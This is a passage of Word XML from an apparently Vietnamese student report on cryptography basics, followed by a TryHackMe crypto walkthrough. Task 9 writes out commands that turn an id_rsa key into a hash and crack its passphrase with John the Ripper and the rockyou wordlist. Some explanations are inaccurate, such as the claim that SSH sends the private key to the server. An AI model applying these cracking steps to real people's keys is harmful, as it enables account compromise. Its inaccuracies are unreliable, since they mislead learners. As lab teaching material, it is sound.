    <w:p w14:paraId="78F11EB5" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="75" w:name="_Toc90050771"/>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>2.5.2.5. Cách phòng chống khai thác lỗ hổng bằng metasploit</w:t>
      </w:r>
      <w:bookmarkEnd w:id="75"/>
    </w:p>
    <w:p w14:paraId="5533F0A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hường xuyên cập nhật các bản vá lỗi là cách hiệu quả nhất để phòng chống khai thác lỗ hổng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A4FE7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hường xuyên kiểm tra hệ thống để phát hiện các dấu hiệu bất thường.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C3822A" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="006F1FD5">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F6531B1" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7830221F" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="0"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="76" w:name="_Toc90050772"/>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>CHƯƠNG 3: THỰC HÀNH</w:t>
      </w:r>
      <w:bookmarkEnd w:id="76"/>
    </w:p>
    <w:p w14:paraId="699A02C2" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="77" w:name="_Toc90050773"/>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>3.1. Thử thách encryptioncrypto101</w:t>
      </w:r>
      <w:bookmarkEnd w:id="77"/>
    </w:p>
    <w:p w14:paraId="5468C44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hử thách này sẽ bao gồm:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="523F0F5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Tại sao mật mã lại quan trọng đối với bảo mật và CTF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="583D63B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Hai lớp chính của mật mã và cách sử dụng của chúng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4628144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RSA và một số công dụng của RSA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A9F316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2 phương pháp trao đổi khóa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1837F49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Ghi chú về tương lai của mã hóa với sự nổi lên của Máy tính lượng tử</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35AE53F1" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="0"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="78" w:name="_Toc90050774"/>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>3.1.1. Các thuật ngữ cơ bản</w:t>
      </w:r>
      <w:bookmarkEnd w:id="78"/>
    </w:p>
    <w:p w14:paraId="7BD7024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Ciphertext: Kết quả của việc mã hóa một bản rõ, dữ liệu được mã hóa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="027FC48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Cipher: Một phương pháp mã hóa hoặc giải mã dữ liệu. Mật mã hiện đại là mật mã, nhưng có nhiều mật mã không phải là mật mã như Caesar.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA2207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Plaintext: Dữ liệu trước khi mã hóa, thường là văn bản nhưng không phải luôn luôn. Có thể là một bức ảnh hoặc tệp khác</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C4576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Encryption: Chuyển đổi dữ liệu thành bản mã, sử dụng mật mã.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F595FE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Encoding: KHÔNG PHẢI là một dạng mã hóa, chỉ là một dạng biểu diễn dữ liệu như base64. Có thể đảo ngược ngay lập tức.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02C22E0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Key: Một số thông tin cần thiết để giải mã chính xác Ciphertext và lấy được plaintext</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E6D03C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Passphrase: Riêng biệt với khóa, cụm mật khẩu tương tự như mật khẩu và được sử dụng để bảo vệ khóa.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6736FAC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Asymmetric encryption: Sử dụng các khóa khác nhau để mã hóa và giải mã.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4340980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Symmetric encryption: Sử dụng cùng một khóa để mã hóa và giải mã</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2014898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Brute force: Tấn công mật mã bằng cách thử mọi mật khẩu khác nhau hoặc mọi khóa khác nhau</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EEBC83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Cryptanalysis: Tấn công mật mã bằng cách tìm ra điểm yếu trong các phép toán cơ bản</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="466DDD12" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="0"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="79" w:name="_Toc90050775"/>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>3.1.2. Tầm quan trọng của mã hoá</w:t>
      </w:r>
      <w:bookmarkEnd w:id="79"/>
    </w:p>
    <w:p w14:paraId="7FC6E09D" w14:textId="26F2E58B"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Cryptography được sử dụng để bảo vệ bí mật, đảm bảo tính toàn vẹn, đảm bảo tính xác thực. Rất có thể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sử dụng mật mã hàng ngày</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA3E884" w14:textId="0B34D400"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 xml:space="preserve">-         Khi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kết nối với SSH, máy khách và máy chủ của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thiết lập một đường hầm được mã hóa để không ai có thể theo dõi phiên của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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1BBEA3" w14:textId="3C1166B3"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         Khi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kết nối với ngân hàng của mình, sẽ có một chứng chỉ sử dụng mật mã để chứng minh rằng đó thực sự là ngân hàng của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hứ không phải là tin tặc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="056D2CEA" w14:textId="53AAE81B"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         Khi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tải xuống một tệp, làm thế nào để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kiểm tra xem nó đã tải xuống đúng chưa?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ó thể sử dụng mật mã tại đây để xác minh dữ liệu.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4860BB3D" w14:textId="2D449F41"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hiếm khi phải tương tác trực tiếp với mật mã, nhưng nó âm thầm bảo vệ hầu hết mọi thứ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làm bằng kỹ thuật số.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41FBEFC6" w14:textId="2006FC93" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>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Bất cứ khi nào dữ liệu nhạy cảm của người dùng cần được lưu trữ, nó nên được mã hóa. Các tiêu chuẩn như PCI-DSS quy định rằng dữ liệu phải được mã hóa cả khi ở trạng thái nghỉ (trong bộ nhớ) và trong khi truyền đi. Nếu đang xử lý chi tiết thẻ thanh toán,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ần tuân thủ các quy định PCI này. Dữ liệu y tế có các tiêu chuẩn tương tự.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="792A45E2" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="0"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="80" w:name="_Toc90050776"/>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>3.1.3. Phép toán cốt yếu trong mã hoá</w:t>
      </w:r>
      <w:bookmarkEnd w:id="80"/>
    </w:p>
    <w:p w14:paraId="65C7EFD4" w14:textId="75147C2D" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>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Toán học xuất hiện tương đối thường xuyên trong mật mã. Toán tử Modulo. Hầu hết mọi ngôn ngữ lập trình đều cho phép triển khai toán tử này hoặc có sẵn nó thông qua thư viện. Khi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ần làm việc với số lượng lớn, hãy sử dụng một ngôn ngữ lập trình. Python rất tốt cho điều này vì các số nguyên có kích thước không giới hạn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42487441" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="0"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="81" w:name="_Toc90050777"/>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>3.1.4.  Các loại mã hoá</w:t>
      </w:r>
      <w:bookmarkEnd w:id="81"/>
    </w:p>
    <w:p w14:paraId="70A0AC1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ai loại chính của Mã hóa là đối xứng và bất đối xứng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF6DD5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Mã hóa đối xứng sử dụng cùng một khóa để mã hóa và giải mã dữ liệu. Ví dụ về mã hóa đối xứng là DES (Broken) và AES. Các thuật toán này có xu hướng nhanh hơn mật mã bất đối xứng và sử dụng các khóa nhỏ hơn (các khóa 128 hoặc 256 bit thường dùng cho AES, các khóa DES dài 56 bit).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F959371" w14:textId="6EECE2EF"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         Mã hóa bất đối xứng sử dụng một cặp khóa, một khóa để mã hóa và khóa còn lại trong cặp để giải mã. Ví dụ như RSA và Elliptic Curve Cryptography. Thông thường các khóa này được gọi là khóa công khai và khóa riêng tư. Dữ liệu được mã hóa bằng khóa cá nhân có thể được giải mã bằng khóa công khai và ngược lại. Khóa cá nhân của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ần được giữ riêng tư, do đó có tên. Mã hóa bất  đối xứng có xu hướng chậm hơn và sử dụng các khóa lớn hơn, ví dụ: RSA thường sử dụng các khóa 2048 đến 4096 bit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68462B2B" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="0"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="82" w:name="_Toc90050778"/>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>3.1.5. Mã hoá và SSH Authentication</w:t>
      </w:r>
      <w:bookmarkEnd w:id="82"/>
    </w:p>
    <w:p w14:paraId="66F2F7A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ách thức hoạt động của SSH Key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12136BC8" w14:textId="5256EC7F"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SSH Key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ứ hiểu đơn giản là một phương thức chứng thực người dùng truy cập bằng cách đối chiếu giữa một key cá nhân (Private Key) và key công khai(Public Key).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E1A8E48" w14:textId="44D132AF"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Private key và Public key luôn có liên hệ chặt chẽ với nhau để nó có thể nhận diện lẫn nhau. Mình nói vậy cho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dễ hình dung nhé, khi tạo một SSH Key thì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sẽ có cả 2 loại key này. Sau đó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mang cái public key bỏ lên máy chủ của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òn cái private key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sẽ lưu ở máy và khi đăng nhập vào server,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sẽ gửi yêu cầu đăng nhập kèm theo cái Private Key này để gửi tín hiệu đến server, server sẽ kiểm tra xem cái Private key của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có khớp với Public key có trên server hay không, nếu có thì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sẽ đăng nhập được.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD12398" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="0"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="83" w:name="_Toc90050779"/>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>3.1.6.  PGP, GPG và AES</w:t>
      </w:r>
      <w:bookmarkEnd w:id="83"/>
    </w:p>
    <w:p w14:paraId="114F43FB" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>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PGP là viết tắt của cụm từ Pretty Good Privacy. PGP thường được sử dụng để gửi tin nhắn đã mã hóa giữa hai người. Nó hoạt động bằng cách mã hóa tin nhắn với public key, gắn liền với một người dùng cụ thể. Khi người dùng đó nhận được tin nhắn, họ sử dụng một private key mà chỉ mình họ biết để giải mã tin nhắn.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28EFABC8" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>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OpenPGP: Cho đến năm 1992, mật mã được liệt vào United States Munitions List (USML) - danh sách các vật phẩm liên quan đến quốc phòng của Hoa Kỳ - với vai trò là một thiết bị quân sự phụ trợ. Điều đó có nghĩa là việc xuất công cụ PGP của Zimmerman sang các nước khác là một tội nghiêm trọng. Trên thực tế, Zimmerman đã bị điều tra vì vi phạm Đạo luật kiểm soát xuất khẩu vũ khí. Do những hạn chế đó, OpenPGP Working Group đã được thành lập với sự giúp đỡ của Nhóm đặc nhiệm kỹ thuật Internet (Internet Engineering Task Force - IEFT). Việc tạo ra một phiên bản PGP mã nguồn mở đã loại bỏ các vấn đề liên quan đến việc xuất mật mã, trong khi vẫn đảm bảo bất kỳ ai cũng có thể sử dụng công cụ mã hóa.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D9DE8F5" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>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GnuPG: GnuPG (GPG) là việc triển khai tiêu chuẩn OpenPGP và được coi là một sự thay thế mạnh mẽ cho PGP của Symantec.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DFEB58C" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>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AES là viết tắt của Advanced Encryption Standard, chuẩn mã hóa dữ liệu rất phổ biến, dùng cho nhiều mục đích và được cả chính phủ Mỹ sử dụng để bảo vệ các dữ liệu tuyệt mật.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F87C50E" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>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AES là kiểu mã hóa đối xứng dạng khối, nghĩa là mỗi khối văn bản có một kích thước nhất định (128 bit) được mã hóa, khác với mã hóa dạng chuỗi khi từng kí tự được mã hóa. Đối xứng nghĩa là khóa để mã hóa và giải mã đều là một.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="069F740B" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="0"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="84" w:name="_Toc90050780"/>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>3.1.7. Tương lai của máy tính lượng tử và mã hoá</w:t>
      </w:r>
      <w:bookmarkEnd w:id="84"/>
    </w:p>
    <w:p w14:paraId="2E33883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áy tính lượng tử sẽ sớm trở thành vấn đề đối với nhiều loại mã hóa.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09FC6A2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ã hoá bất đối xứng và Lượng tử</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33808C3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ặc dù không chắc chúng ta sẽ có các máy tính lượng tử đủ mạnh cho đến khoảng năm 2030, nhưng một khi những mã hóa này tồn tại sử dụng RSA hoặc Elip Curve Cryptography sẽ rất nhanh bị phá vỡ. Điều này là do máy tính lượng tử có thể giải quyết rất hiệu quả các vấn đề toán học mà các thuật toán này dựa vào sức mạnh của chúng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="659103F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AES / DES và Lượng tử</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0751BB4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AES với các khóa 128 bit cũng có khả năng bị máy tính lượng tử phá vỡ trong tương lai gần, nhưng AES 256 bit không thể bị phá dễ dàng như vậy. Triple DES cũng dễ bị tấn công từ các máy tính lượng tử.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="658959A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huyến nghị hiện tại</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6140EF2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NSA khuyến nghị sử dụng RSA-3072 hoặc cái tốt hơn mã hóa bất đối xứng và AES-256 hoặc cái tốt hơn mã hóa đối xứng. Có một số cuộc thi hiện đang diễn ra cho các thuật toán mật mã an toàn lượng tử và có khả năng chúng tôi sẽ có một tiêu chuẩn mã hóa mới trước khi máy tính lượng tử trở thành mối đe dọa đối với RSA và AES.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13236757" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="0"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="85" w:name="_Toc90050781"/>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>3.1.8. Các task</w:t>
      </w:r>
      <w:bookmarkEnd w:id="85"/>
    </w:p>
    <w:p w14:paraId="5040229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sk 9: SSH Authentication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="477CA8B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hỏi 1: Thuật toán mà khoá sử dụng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1462545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hỏi 2: Tải file idrsa.id_rsa và tiến hành crack để lấy mật khẩu với Join The Ripper và rockyou</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B4A8D3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ác bước tiến hành:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="161810E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Bước 1: Tải file ssh2join.py để tạo mã hash từ file idrsa.id_rsa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="344D684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260BE206" wp14:editId="30EAC5DD">
            <wp:extent cx="5731200" cy="3149600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="390"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36"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731200" cy="3149600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A6370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Bước 2: Dùng lệnh python ssh2join.py idrsa.id_rsa &gt; id_rsa.hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B99A2B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39B58647" wp14:editId="03ED2737">
            <wp:extent cx="5731200" cy="546100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="39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37"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731200" cy="546100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="10052A6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Bước 3: Dùng lệnh john –wordlist=rockyou.txt id_rsa.hash để dò mật khẩu từ mã hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3138103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3C061F27" wp14:editId="51E60185">
            <wp:extent cx="5731200" cy="2717800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="39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8"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731200" cy="2717800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED3490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Bước 4: Thu được kết quả</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA46D3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7FD529CC" wp14:editId="2FB17930">
            <wp:extent cx="5731200" cy="914400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="39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9"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731200" cy="914400"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="30FF16F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4682E680" wp14:editId="26D1A1F4">
            <wp:extent cx="5731200" cy="901700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="39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0"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731200" cy="901700"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="452029B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sk 10: PGP, GPG, AES</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DEC34B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533EE53B" wp14:editId="2EECEF3D">
            <wp:extent cx="5731200" cy="508000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="39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41"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731200" cy="508000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="69AFC41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hỏi: Download các file gồm massage.gpg và tryhackme.key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1701D42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Bước 1: import key vào gpg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C34F8C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52A2B2BA" wp14:editId="46AF72EB">
            <wp:extent cx="5731200" cy="2019300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="396"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42"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731200" cy="2019300"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
